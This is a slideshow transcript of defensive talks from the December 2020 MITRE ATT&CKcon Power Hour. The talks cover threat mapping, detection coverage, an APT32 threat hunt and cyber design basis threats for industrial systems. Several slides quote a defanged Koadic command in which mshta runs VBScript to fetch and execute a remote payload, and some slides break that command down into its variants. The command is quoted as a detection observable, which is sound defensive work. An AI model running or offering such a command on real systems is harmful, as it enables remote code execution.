Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

MITRE ATTACKCon Power Hour - December

Presentation slides from the MITRE ATT&CKcon Power Hour session held on December 11, 2020.

  • Be the first to comment

MITRE ATTACKCon Power Hour - December

  1. 1. Welcome
  2. 2. Join us on Slack
  3. 3. Valentina Palacín THREAT MAPPING CATALOGUE
  4. 4. TABLE OF CONTENTS 01 ABOUT ME 02 INSPIRATION 03 IDEA 04 EXPECTATIONS 05 REALITY 06 FUTURE
  5. 5. 01 ABOUT MEValentina Palacín @fierytermite
  6. 6. VALENTINA PALACÍN @FIERYTERMITE Translator Threat Intelligence Analyst Threat Hunter & Python Developer in progress
  7. 7. 02 INSPIRATIONHow was the idea born ?
  8. 8. THREAT LIBRARY Knowledge Base for distilled and curated intelligence insights produced by CTI Research Teams & OSINT Sources.
  9. 9. HowCAN I LEVERAGE SOMETHING LIKE THIS IF I DON’T HAVE A DEDICATED TEAM?
  10. 10. 03 IDEAThreat Mapping Catalogue
  11. 11. WHAT IF…? TMC ATT&CK
  12. 12. 04 EXPECTATIONS Capabilities
  13. 13. MY WISHLIST ● Load DB with ATT&CK content ● Use TRAM to load new relationships ● Manually add adversary mappings ● Create more relationships (industries, dates, adversary types…) ● Explore relationships through GUI ● Edit selected data through GUI ● Edit relationships through GUI ● Export data to ATT&CK Navigator ● Dockerize everything for easy deployment
  14. 14. But2020
  15. 15. WHY DID I DO THIS TO MYSELF?
  16. 16. 05 REALITYCapabilities
  17. 17. SO FAR… ● Load DB with ATT&CK content ● Use TRAM to load new relationships ● Manually add adversary mappings ● Create more relationships (industries, dates, adversary types…) ● Explore relationships through GUI ● Edit selected data through GUI ● Edit relationships through GUI ● Export data to ATT&CK Navigator ● Dockerize everything for easy deployment
  18. 18. /first-time git clone https://github.com/fierytermite/attack-navigator git clone --branch tmc https://github.com/fierytermite/tram-1 git clone https://github.com/intelforge/tmc * Register and Login with the new user
  19. 19. FIRST…
  20. 20. FIRST… 1.3H
  21. 21. localhost:4200/fetch/http:%2F%2Flocalhost:5000%2Fstatic%2Fexport%2Fadversary_1_60ba8984-3b68-11eb-834e-080027bab013.json
  22. 22. 06 FUTURECapabilities
  23. 23. GOALS ● Create more relationships (dates, adversary types…) ● Manually load new mapping ● Edit relationships through UI ● Dockerize everything for easy deployment ● Add relational graphs to study the adversaries
  24. 24. BUT FOR NOW…
  25. 25. CREDITS: This presentation template was created by Slidesgo, including icons by Flaticon, and infographics& images by Freepik. THANKS! Please keep this slide for attribution. Do you have any questions? @fierytermite linkedin.com/in/valentinapalacin Credits: This presentation template was created by Slidesg, including icons by Flaticon and infographics & images by Freepik.
  26. 26. From Theory to Practice: How My ATT&CKⓇ Perspectives Have Changed Katie Nickels ATT&CKcon Power Hour December 11, 2020
  27. 27. Yes, this is being recorded. Yes, the slides will be shared. No, I don’t know when. Soon.
  28. 28. § Former MITRE ATT&CK Team Member (relevant) § SANS Certified Instructor for FOR578: Cyber Threat Intelligence § Bringing context about threats to inform decisions § Maintaining sanity with exercise, chocolate, containers, and holiday lightsKatie Nickels DIRECTOR OF INTELLIGENCE RED CANARY @LiketheCoins About Me
  29. 29. Different perspectives help you think differently
  30. 30. 1. Tracking tactics, techniques, and procedures 2. Defining detection coverage 3. Choosing what to detect How I've thought differently about ATT&CK
  31. 31. Thinking through TTPs
  32. 32. Tracking TTPs the MITRE way https://attack.mitre.org/techniques/T1218/005/ Tactic: Defense Evasion Technique/Sub-technique: Signed Binary Proxy Execution: Mshta Procedure: Koadic can use MSHTA to serve additional payloads.[13]
  33. 33. A Koadic detection at Red Canary Procedure... So what’s this?
  34. 34. Tactics Techniques/Sub-techniques Procedures Observables We want to track things beyond TTPs
  35. 35. Defense Evasion/Execution T1218.005 Signed Binary Proxy Execution: Mshta Koadic used VBScript to launch mshta.exe and make an external network connection C:Windowssystem32mshta.EXE vbscript:CreateObject("WScript.Shell"). run("mshta hxxp[:]//8.8.8[.]8:123/12qwert",0)(window.close) Example of tracking beyond TTPs
  36. 36. Primary Tactic: Execution Additional Tactics Techniques Procedure ★ Observable Koadic uses VBScript to launch mshta.exe and make an external network connection. C:Windowssystem32mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:1234/1234656qwerty",0)(window.close) Detectors Name Targeted to this profile? WIN-MSHTA-CLI-URL No WIN-MSHTA-NON-HTA No WIN-MSHTA-INLINE-VBSCRIPT No TA0005 Defense Evasion T1218.005 Signed Binary Proxy Execution: Mshta T1059.005 Command and Scripting Interpreter: Visual Basic
  37. 37. What this format lets us do § Track detailed observables from endpoint telemetry § Identify where we have detection coverage (or not) § Use ATT&CK tactics, techniques, and sub-techniques ...but add on because it meets our needs
  38. 38. Defining detection coverage
  39. 39. Defining coverage by confidence https://i.blackhat.com/USA-19/Wednesday/us-19-Nickels-MITRE-ATTACK-The-Play-At-Home-Edition.pdf
  40. 40. The challenge of unlimited procedures “You should also remember that each ATT&CK technique may have many procedures for how an adversary could implement it — and because adversaries are always changing, we can’t know what all those procedures are in advance.” https://medium.com/mitre-attack/how-to-be-a-savvy-attack-consumer-63e45b8e94c9
  41. 41. Katie: “There are unlimited procedures!” § Matt: “But are there?” o Think of techniques like MSHTA o Commands only have so many flags § We may be able to be scope some technique variations
  42. 42. Defining detection coverage by variations
  43. 43. Tactics Techniques/Sub-techniques Variations Procedures Observables Tactics Techniques/Sub-techniques Adding in variations Variations are specific options made available to an attacker as defined by the technical components involved that comprise a technique (working definition)
  44. 44. Nine known variations for HTA 1. HTA can have any file name and extension 2. Specifying a URI from where HTA content is first downloaded 3. Use of scripting engines 4. Specifying protocol handlers (e.g., “vbscript”, “javascript”, “about”) 5. HTA content embedded and executed from within other file formats 6. HTA content can be executed remotely via UNC paths. 7. Remote HTA execution via COM interface (lateral movement) 8. HTA execution by double clicking or invoking with “explorer.exe foo.hta” 9. Full control over the path and filename of mshta.exe and rundll32.exe https://redcanary.com/blog/threat-research-questions
  45. 45. Adding in variations Defense Evasion/Execution T1218.005 Signed Binary Proxy Execution: Mshta Specifying protocol handler + direct download from URI Koadic used VBScript to launch mshta.exe and make an external network connection C:Windowssystem32mshta.EXE vbscript:CreateObject("WScript.Shell"). run("mshta hxxp[:]//8.8.8[.]8:123/12qwert",0)(window.close)
  46. 46. Mix and match the variations Specifying protocol handler vbscript: Direct download from URI mshta hxxp[:]//8.8.8[.]8:123/ Specifying protocol handler jscript: https://github.com/redcanaryco/AtomicTestHarnesses/tree/master/TestHarnesses/T1218.005_Mshta
  47. 47. Testing known variation combinations T1218.005 Signed Binary Proxy Execution: Mshta 25 tested combinations 1 technique More granular Less granular
  48. 48. Defining detection coverage by threat observables
  49. 49. Remember that profile breakdown? Techniques Observable Koadic uses VBScript to launch mshta.exe and make an external network connection. C:Windowssystem32mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:1234/1234656qwerty",0)(window.close) Detectors Name Targeted to this profile? WIN-MSHTA-CLI-URL No WIN-MSHTA-NON-HTA No WIN-MSHTA-INLINE-VBSCRIPT No T1218.005 Signed Binary Proxy Execution: Mshta T1059.005 Command and Scripting Interpreter: Visual Basic
  50. 50. Mapping coverage based on threats Koadic observable 1 Koadic observable 2 FIN7 observable 1 FIN7 observable 2 Kovter observable 1 Lazarus observable 1 6 threat observables for Mshta 1 technique More granular Less granular T1218.005 Signed Binary Proxy Execution: Mshta
  51. 51. So how should we explain detection coverage?
  52. 52. Explaining to leadership This is okay!
  53. 53. Koadic observable 1 Koadic observable 2 FIN7 observable 1 FIN7 observable 2 Lazarus observable 1 Diving deeper These are okay too! HTA test harness results Mshta threat observables
  54. 54. Expressing coverage is just tough § Any way you express it will have limitations § There’s no “right” or “wrong” way to do it ...but there may be “better” ways for your needs § Figure out the requirement for what you’re doing o What are you trying to convey and achieve? o What’s your goal of expressing the coverage?
  55. 55. Choosing what to detect
  56. 56. § Not everything is useful for detection § Choosing is most of the battle https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ Finding “good” detection opportunities
  57. 57. § “Discovery techniques aren’t that useful for detection” https://i.blackhat.com/USA-19/Wednesday/us-19-Nickels-MITRE-ATTACK-The-Play-At-Home-Edition.pdf Discovery techniques
  58. 58. § “...except when they are” Domain Trust Discovery with nltest
  59. 59. § “This should NEVER happen in an environment, let’s write a detection analytic!” —Me in January 2020 § “Here’s a hypothesis that will probably be noisy so here are five ways to tune it when that happens.” —Me in December 2020 § If an analytic is noisy…how can we tune it? o Narrow it down? Use threat intelligence. o Easily suppress on false positives? Testing & tuning is most of the work https://redcanary.com/blog/tuning-detectors/
  60. 60. In closing
  61. 61. Takeaways § Don’t limit yourself to just TTPs if you need to go further § Define detection coverage based on your requirements § Trial, error, and experience will help you choose what to detect § It’s a good thing to change your perspectives § Surrounding yourself with new people and new situations lets you think differently and mature
  62. 62. Thank you! Katie Nickels @RedCanary @LiketheCoins https://redcanary.com/blog/
  63. 63. Sharpening your Threat Hunting Program with ATT&CK Framework HieuTran Detection Team Lead | FPT Cybersecurity Division
  64. 64. INDEX Sharpening your Threat Hunting Program with ATT&CK framework 01 Threat Hunting vs Threat Detection 03 MITRE ATT&CK - Threat Hunter Common Language 02Threat Hunting Methodology 04Case study 05 Key takeaways 06Q&A
  65. 65. Human-driven (and assisted by tools) practice of searching iteratively through data to detect advanced threats that evade traditional security controls
  66. 66. Threat Hunting vs Threat Detection Threat Hunting Threat Detection DEFINITION • Proactive • Humans find bad stuffs with the help of machines PROs • Identifying detection gaps and creation of new detections CONs • Need security expert for searching, hunting…etc • Slow and expensive DEFINITION • Reactive • Automated with machines such as SIEM, IDS/IPS, AV, etc PROs • Least expensive approach CONs • Likely to miss something (False Negatives) • Spend too much time because of alert fatigues (False Positives)
  67. 67. What are we looking for?
  68. 68. NUMBERS TELL STORIES: GLOBAL DWELL TIME It takes so long to detect bad guys inside your organization. FireEye Mandiant M-Trends 2020 Special Report
  69. 69. Threat Hunting Methodology 1.Target: Scope the data sets that will be used in your investigation. Hunts can branch from various starting points. 2.Hunt: Proactively and iteratively search through network and endpoint data to detect and isolate advanced threats that evade more traditional security solutions. 3.Disrupt: Seamlessly pivot from hunting to forensic analysis, in order to disrupt adversaries before they fully execute their attacks. These analyses can also generate new indicators that can be fed into complementary security systems, creating a valuable security feedback loop.
  70. 70. MITRE ATT&CK - Threat Hunter Common Language
  71. 71. Case Study: APT32 Threat Hunting and Incident Response against Cyber Espionage Threat Actors: APT32 – OceanLotus/SeaLotus/CobaltKitty Our customer current situation: • Large enterprise with huge numbers of endpoints: ~1000 Servers, 6000 Workstations. • Core services (Active Directory, Email Server, Antivirus Management) already compromised. • Operations and security staff machines were compromised. IT IS A CHAOS
  72. 72. https://twitter.com/ItsReallyNick/status/915800233455575040
  73. 73. Based on what we found on compromised servers/workstations, we built our hypothesis: • Gain Initial Access by using Spear Phishing to gather Valid (administrator) Accounts. • Execution malicious payload with Living-off-the-land Binary (LOLBIN) techniques. • Stay Persistence by installing New Service or Registry Run Keys. • Stay under the radar (Defense Evasion) by Software Packing, DLL Hijacking, File Deletion…. • Discovery by Network Service Scanning and Bruteforcing using custom malware/scripts. • C2 Communication using Commonly Used Port (80, 443, 53) Case Study: APT32
  74. 74. https://gist.githubusercontent.com/itsreallynick/2bd73f54d643fe4553d413e71b3893cc/raw/06c7c7012b17b890ffb 8f5029d5f367c9a7122ee/pok%25C3%25A9.txt
  75. 75. Case Study #1 We deployed independent hunting stacks: • Endpoint Detection & Response • Datalake (Gathering all essentials service logs, including: DNS, Proxy, AD…) • Advanced Threat Detection • Network Detection & Response Automate lots of work by leveraging OpenAPI: • Quickly deploy data acquisitions script across enterprise infrastructure. • Preventing active C2 connection with Endpoint Isolation and Binary Isolation. • Speeding up cleaning malware artifacts (remove binary files, executable files and registry run keys).
  76. 76. Case Study #1 At the end of the days, we discovered: • 13 C2 domains and 12 C2 IPs: • 04 C2 domains have never seen before. • 26 servers and 96 clients were compromised. • 09 UserSIDs were used to install malicious service. • Multiple malware artifacts, could be divine into 03 groups: • Binary files (.exe and .dll files) • Script (Powershell, C#, JScript, .NET) • Webshell (PHP Script) • C2 Payload (found in Registry)
  77. 77. We will be able to hunting at scale with: Right staff with right skillsets Right process/procedures for hunting Right technical solutions that enable hunters
  78. 78. Key Takeaways 1. Assume-breach mindset. 2. Training your staffs with threat hunter skillsets (or outsource). 3. Building roadmap for implementing solution properly.
  79. 79. THANK YOU. QUESTIONS? HieuTT35@fpt.com.vn Twitter: @HieuTra34558978
  80. 80. USING ATT&CK TO CREATE CYBER DBTS DR. JACOB BENJAMIN
  81. 81. PREVIOUS ICS EXPERIENCE + Idaho National Laboratory + Areva NP + Duke Energy ABOUT THE PRESENTER JACOB BENJAMIN – DIRECTOR OF PROFESSIONAL SERVICES RESEARCH AREAS + Nuclear Cybersecurity + Cyber Risk Management + Wireless Security + Software-Defined Networking + Malware Analysis + Steganography Detection CREDENTIALS + Ph.D., Computer Science + M.S., Cybersecurity + B.S., Computer Science + CISSP
  82. 82. + What is a DBT? + How are they developed? + What does a DBT look like? + Are there cyber DBTs? DESIGN BASIS THREAT (DBT) OVERVIEW
  83. 83. “ATTEMPT OF THEFT OF A SIGNIFICANT AMOUNT OF NUCLEAR MATERIAL (E.G. 10KG OF PU) BY A GROUP OF 6 OUTSIDERS EQUIPPED WITH 10 KG TNT EXPLOSIVE, AUTOMATIC WEAPONS (INCLUDING LIGHT INFANTRY WEAPONS) AND SPECIFIC COMMERCIALLY AVAILABLE INTRUSION TOOLS. THEY HAVE A COMPREHENSIVE KNOWLEDGE OF THE FACILITY AND ASSOCIATED PHYSICAL PROTECTION MEASURES. WILLING TO DIE OR TO KILL. NO COLLUSION WITH INSIDER.” IAEA DBT WORKSHOP EXAMPLE DBT
  84. 84. S E N S I N G O P P O R T U N I T I E S RESPONSE TIME VS ADVERSARY TASK TIME Adversary Task Time Adversary Task Time Remaining After 1st Sensing PPS Response Time T0 TD Ti Tc Detection Time Response Force Time Time Remaining After Interruption Adversary Detected Adversary Interrupted Time First Sensing Adversary Begins Task Adversary Completes Task
  85. 85. Z Z Z CYBER SECURITY FOR NUCLEAR POWER PLANTS KEY DOCUMENTS • NEI 04-04, Voluntary Cyber Program • 10 CFR 73.54, The Cyber Rule • NEI 08-09, Cyber Security Plan • NEI 13-10, Cyber Security Assessments CHALLENGES • Describing the cyber threat landscape • Modeling cyber-initiated events • Mal-operation vs malware USING ATT&CK • Describe threat behavior • Conduct adversary emulation • Evaluate actual events & case studies Cybersecurity risk mitigation for nuclear power plants began in 2002 and 2003, when the NRC included cybersecurity requirements in the Physical Security and Design Basis Threat Orders.
  86. 86. Z Z Z USING TRADITIONAL DBT ANALYSIS FOR CYBER PAST CYBER EVENTS Nuclear sector Energy sector ICS overall CREDIBLE THREAT INTELLIGENCE Dragos World View Bulletins CISA / ICS-CERT Vendors SITE SPECIFIC TARGETS Crown Jewel Analysis Consequence-based targeting
  87. 87. EXAMPLE CYBER DBT DEVELOPMENT • SIS • Turbines • Generators Targets • CrashOverride • Trisis • Stuxnet Past Events • World View • CISA • Vendors Threat Intel
  88. 88. ATTEMPT TO CAUSE A LOSS OF SAFETY IMPACT. ADVERSARY HAS BEEN KNOWN TO USE DRIVE-BY COMPROMISE, EXTERNAL REMOTE SERVICES, VALID ACCOUNTS, SUPPLY CHAIN COMPROMISE, AND ICS- TAILORED MALWARE. THEY HAVE DESTRUCTIVE CAPABILITIES, UNDERSTAND PROCESS IMPLICATIONS, AND HAVE SPECIFIC KNOWLEDGE OF INDUSTRIAL CONTROL SYSTEMS. WILLING TO CAUSE PHYSICAL HARM OR KILL. NO COLLUSION WITH INSIDER. CYBER DBT RESULT
  89. 89. TTP Name Mitigations T0822 External Remote Services M1042, M1035, M1032, M1030 T0859 Valid Accounts M1047, M1037, M1032, M1027, M1026, M1018 T0817 Drive-by Compromise M1021 T0862 Supply Chain Compromise M1049, M1016 S0013 Trisis M1049, M1035, M1040, M1038, M1030 LEVERAGING CYBER DBTS ASSESSING MITIGATION COVERAGE
  90. 90. LEVERAGING CYBER DBTS ASSESSING MITIGATION COVERAGE ATT&CK NAME M1032 Multi-factor Authentication T859 Valid Accounts T822 External Remote Services M1049 Antivirus / Antimalware S0013 Trisis T862 Supply Chain Compromise M1021 Restrict Web-Based Content T817 Drive-by Compromise
  91. 91. LEVERAGING CYBER DBTS ASSESSING DETECTION COVERAGE Scripting PowerShell AppleScript Windows Command Shell Unix Shell Visual Basic Python JavaScript/JScript Trisis [S0013]
  92. 92. • DIGEST THREAT INTELLIGENCE • WorldView, CISA, vendors, etc. • UNDERSTAND YOUR SYSTEMS • Crown Jewel Analysis • EVALUATE YOUR DEFENSES • Quantify your mitigation and detection coverage • FOCUS ON THREAT BEHAVIORS • Combine and correlate this information with a common lexicon (ATT&CK) HOW TO CREATE A CYBER DBT SUMMARY
  93. 93. • ASSESS EFFECTIVENESS OF DEFENSES • EVALUATE THREAT DETECTION COVERAGE • DEVELOP AND TEST IR PLAYBOOKS • TRAIN PERSONNEL • IDENTIFY ‘BEYOND DESIGN’ SCENARIOS WHY SHOULD YOU USE CYBER DBTS? SUMMARY
  94. 94. f JBENJAMIN@DRAGOS.COM
  95. 95. ©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17 What’s New with ATT&CK® for ICS? Otis Alexander https://attack.mitre.org/ics @ojalexander
  96. 96. ©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17
  97. 97. ©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17
  98. 98. ©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17 ATT&CK for ICS Mitigations https://collaborate.mitre.org/attackics/index.php/Mitigations • M0800-M0816 are new to ATT&CK for ICS • Each mitigation has mappings to IEC 62443 and NIST SP 800-53 • Mitigations target the following stakeholders: • Asset owner/operators • Integrators • Device vendors • Security vendors • There is a significant focus on protecting operational and management interfaces of embedded controllers
  99. 99. ©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17 STIX and Navigator Integration •As part of ATT&CK v8, we released ATT&CK for ICS in STIX https://github.com/mitre/cti/tree/master/ics-attack •A new version of ATT&CK Navigator was released as well where you can pick the ICS domain https://mitre-attack.github.io/attack-navigator/
  100. 100. What’s on the Horizon?
  101. 101. ©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17 Updates to Data Sources • Maintaining visibility into ICS networks is essential for quickly detecting and remediating cyber threats. • Understanding the various data sources that are available in ICS networks is key to this endeavor. Network traffic is a popular source of data in ICS networks but there are other valuable sources of data that are often overlooked. • Embedded device logs • Application logs • Operational databases
  102. 102. ©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17 Data Sources Configuration • Firmware version • System settings • Control logic • Parameters Performance and Statistics • CPU, memory, disk, ethernet, etc. • Network connection information Process Information • I/O values associated with tags • Alarms and faults (e.g., digital fault recorder) • Events (e.g., command execution) • Process quality (e.g., phasor measurement unit) Asset Management • Condition-based monitoring • Predictive maintenance • Work order system Physical • Physical sensors (e.g., tamper detection)
  103. 103. ©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17 ICS Attacks Mapped to Enterprise • We’re currently working on mapping the following ICS attacks: • Stuxnet • Ukraine 2015 • Industroyer • Triton • Adversaries do not respect theoretical boundaries (i.e., IT/ICS) so it is important to have a deep understanding of how IT platforms are leveraged to access and impact ICS.
  104. 104. ©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17 We Need Your Help! •How can we improve ATT&CK for ICS? •How are you currently using mitigations? •Do you have any opinions on our data source focus?
  105. 105. ©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17 attack@mitre.org @MITREattack Otis Alexander @ojalexander
  106. 106. Join our next session on January 14 Register now! https://na.eventscloud.com/ATTACKcon-power-hour

×